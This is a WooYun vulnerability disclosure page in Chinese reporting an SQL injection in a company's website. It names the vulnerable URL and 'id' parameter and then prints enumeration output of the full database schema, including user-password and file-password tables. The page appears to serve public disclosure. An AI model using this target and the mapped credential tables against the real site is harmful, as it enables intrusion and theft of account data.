漏洞概要 关注数(1) 关注此漏洞
缺陷编号: WooYun-2016-187538
漏洞标题: 亿阳信通股份有限公司存在SQL注入漏洞泄露相关信息
相关厂商: 亿阳信通股份有限公司
漏洞作者: 1993*
提交时间: 2016-03-22 09:35
公开时间: 2016-05-06 09:35
漏洞类型: SQL注射漏洞
危害等级: 中
自评Rank: 10
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系
Tags标签: 无
漏洞详情
披露状态:
2016-03-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-06: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
详细说明:
http://www.boco.com.cn:8080/bocoit/common.asp?id=4182
注入参数:id
当前数据库
有19个表
Database: BOCOICT
[19 tables]
+---------------+
| CAPLEVEL |
| CAPTION |
| FEEDBACK |
| FILEPASSWORD |
| FUNMODULE |
| HRAREA |
| HRCAPTION |
| HRDEPT |
| HRPAGECONTENT |
| HRTREECAPTION |
| LANGUAGETYPE |
| PAGECONTENT |
| PAGEFLOW |
| PICTYPE |
| SYSROLE |
| SYSUSER |
| TREECAPTION |
| UPFILE |
| VISITCOUNT |
+---------------+
数据库表中的字段
Database: BOCOICT
Table: HRCAPTION
[13 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| CAPDEEP | VARCHAR2 |
| CAPNAME | VARCHAR2 |
| CAPTIONORDER | NUMBER |
| CAPTREE | VARCHAR2 |
| CAPURL | VARCHAR2 |
| CREATMAN | VARCHAR2 |
| CREATTIME | DATE |
| ID | VARCHAR2 |
| LANGUAGETYPE | VARCHAR2 |
| MODIFYMAN | VARCHAR2 |
| MODIFYTIME | DATE |
| POPTYPE | VARCHAR2 |
| REMARK | VARCHAR2 |
+--------------+----------+
Database: BOCOICT
Table: LANGUAGETYPE
[2 columns]
+------------------+--------
| Column | Type
+------------------+--------
| LANGUAGETYPECODE | VARCHAR
| LANGUAGETYPENAME | VARCHAR
+------------------+--------
Database: BOCOICT
Table: FEEDBACK
[7 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| TIME | DATE |
| CONTENT | LONG |
| EMAIL | VARCHAR2 |
| ID | NUMBER |
| NAME | VARCHAR2 |
| TELEPHONE | VARCHAR2 |
| UNIT | VARCHAR2 |
+-----------+----------+
Database: BOCOICT
Table: HRDEPT
[4 columns]
+------------+-----------+
| Column | Type |
+------------+-----------+
| HRDEPTID | NVARCHAR2 |
| HRDEPTNAME | NVARCHAR2 |
| REGNAME | NVARCHAR2 |
| REGTIME | NVARCHAR2 |
+------------+-----------+
Database: BOCOICT
Table: UPFILE
[7 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| CREATMAN | VARCHAR2 |
| CREATTIME | DATE |
| FILEID | VARCHAR2 |
| FILENAME | VARCHAR2 |
| FILESTATION | VARCHAR2 |
| FILEURL | VARCHAR2 |
| OFILENAME | VARCHAR2 |
+-------------+----------+
Database: BOCOICT
Table: FILEPASSWORD
[2 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| FILENAME | VARCHAR2 |
| PSW | VARCHAR2 |
+----------+----------+
Database: BOCOICT
Table: HRPAGECONTENT
[27 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| AUDITRLT | VARCHAR2 |
| BELONG | VARCHAR2 |
| BEUP | VARCHAR2 |
| BEUSED | VARCHAR2 |
| CAPTIONID | VARCHAR2 |
| CAPTIONORDER | VARCHAR2 |
| CAPTIONTYPE | VARCHAR2 |
| CONTENT | LONG |
| CREATMAN | VARCHAR2 |
| CREATTIME | DATE |
| EDITTYPE | VARCHAR2 |
| HR_DEPT | VARCHAR2 |
| HR_DIDIAN | VARCHAR2 |
| HR_EMAIL | VARCHAR2 |
| HR_GANGWEI | VARCHAR2 |
| HR_NUM | VARCHAR2 |
| HR_RENZHI | VARCHAR2 |
| HR_TIME | VARCHAR2 |
| ID | VARCHAR2 |
| LANGUAGETYPE | VARCHAR2 |
| NYEAR | VARCHAR2 |
| PAGENAME | VARCHAR2 |
| PAGETYPE | VARCHAR2 |
| PAGEURL | VARCHAR2 |
| PICTYPE | VARCHAR2 |
| PORDER | NUMBER |
| REMARK | VARCHAR2 |
+--------------+----------+
Database: BOCOICT
Table: SYSROLE
[2 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| ROLECODE | VARCHAR2 |
| ROLENAME | VARCHAR2 |
+----------+----------+
Database: BOCOICT
Table: CAPTION
[11 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| CAPNAME | VARCHAR2 |
| CAPTIONORDER | NUMBER |
| CAPURL | VARCHAR2 |
| CREATMAN | VARCHAR2 |
| CREATTIME | DATE |
| ID | VARCHAR2 |
| LANGUAGETYPE | VARCHAR2 |
| MODIFYMAN | VARCHAR2 |
| MODIFYTIME | DATE |
| POPTYPE | VARCHAR2 |
| REMARK | VARCHAR2 |
+--------------+----------+
Database: BOCOICT
Table: CAPLEVEL
[2 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| CAPLEVELCODE | VARCHAR2 |
| CAPLEVELNAME | VARCHAR2 |
+--------------+----------+
Database: BOCOICT
Table: VISITCOUNT
[3 columns]
+---------+----------+
| Column | Type |
+---------+----------+
| COUNT | NUMBER |
| ID | VARCHAR2 |
| SUPERID | VARCHAR2 |
+---------+----------+
Database: BOCOICT
Table: SYSUSER
[11 columns]
+----------------+----------
| Column | Type
+----------------+----------
| BEUSED | VARCHAR2
| CREATMAN | VARCHAR2
| CREATTIME | DATE
| ID | VARCHAR2
| PASSWORD | VARCHAR2
| REMARK | VARCHAR2
| ROLE | VARCHAR2
| SYS | VARCHAR2
| USERDEPARTMENT | VARCHAR2
| USERNAME | VARCHAR2
| USERTRUENAME | VARCHAR2
+----------------+----------
Database: BOCOICT
Table: PAGEFLOW
[10 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| AUDITEND | VARCHAR2 |
| AUDITPASS | VARCHAR2 |
| AUDITTIME | DATE |
| AUDITUSER | VARCHAR2 |
| CREATMAN | VARCHAR2 |
| CREATTIME | DATE |
| ID | VARCHAR2 |
| MIND | VARCHAR2 |
| PAGEID | VARCHAR2 |
| TOPAGEID | VARCHAR2 |
+-----------+----------+
Database: BOCOICT
Table: PICTYPE
[2 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| PICTYPECODE | VARCHAR2 |
| PICTYPENAME | VARCHAR2 |
+-------------+----------+
Database: BOCOICT
Table: HRTREECAPTION
[15 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| CAPTIONORDER | NUMBER |
| CREATMAN | VARCHAR2 |
| CREATTIME | DATE |
| ID | VARCHAR2 |
| LANGUAGETYPE | VARCHAR2 |
| MODIFYMAN | VARCHAR2 |
| MODIFYTIME | DATE |
| POPTYPE | VARCHAR2 |
| REMARK | VARCHAR2 |
| SUPERID | VARCHAR2 |
| SUPERID1 | VARCHAR2 |
| SYS | VARCHAR2 |
| TCAPLEVEL | VARCHAR2 |
| TCAPNAME | VARCHAR2 |
| TCAPURL | VARCHAR2 |
+--------------+----------+
Database: BOCOICT
Table: FUNMODULE
[2 columns]
+---------+----------+
| Column | Type |
+---------+----------+
| MODCODE | VARCHAR2 |
| MODNAME | VARCHAR2 |
+---------+----------+
Database: BOCOICT
Table: PAGECONTENT
[19 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| AUDITRLT | VARCHAR2 |
| BELONG | VARCHAR2 |
| BEUP | VARCHAR2 |
| BEUSED | VARCHAR2 |
| CAPTIONID | VARCHAR2 |
| CAPTIONORDER | VARCHAR2 |
| CAPTIONTYPE | VARCHAR2 |
| CONTENT | LONG |
| CREATMAN | VARCHAR2 |
| CREATTIME | DATE |
| EDITTYPE | VARCHAR2 |
| ID | VARCHAR2 |
| LANGUAGETYPE | VARCHAR2 |
| NYEAR | VARCHAR2 |
| PAGENAME | VARCHAR2 |
| PAGEURL | VARCHAR2 |
| PICTYPE | VARCHAR2 |
| PORDER | NUMBER |
| REMARK | VARCHAR2 |
+--------------+----------+
Database: BOCOICT
Table: TREECAPTION
[14 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| CAPTIONORDER | NUMBER |
| CREATMAN | VARCHAR2 |
| CREATTIME | DATE |
| ID | VARCHAR2 |
| LANGUAGETYPE | VARCHAR2 |
| MODIFYMAN | VARCHAR2 |
| MODIFYTIME | DATE |
| POPTYPE | VARCHAR2 |
| REMARK | VARCHAR2 |
| SUPERID | VARCHAR2 |
| SYS | VARCHAR2 |
| TCAPLEVEL | VARCHAR2 |
| TCAPNAME | VARCHAR2 |
| TCAPURL | VARCHAR2 |
+--------------+----------+
Database: BOCOICT
Table: HRAREA
[4 columns]
+----------+-----------+
| Column | Type |
+----------+-----------+
| AREAID | NVARCHAR2 |
| AREANAME | NVARCHAR2 |
| REGNAME | NVARCHAR2 |
| REGTIME | NVARCHAR2 |
+----------+-----------+
漏洞证明:
修复方案:
还望指教!
版权声明:转载请注明来源 1993*@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
评论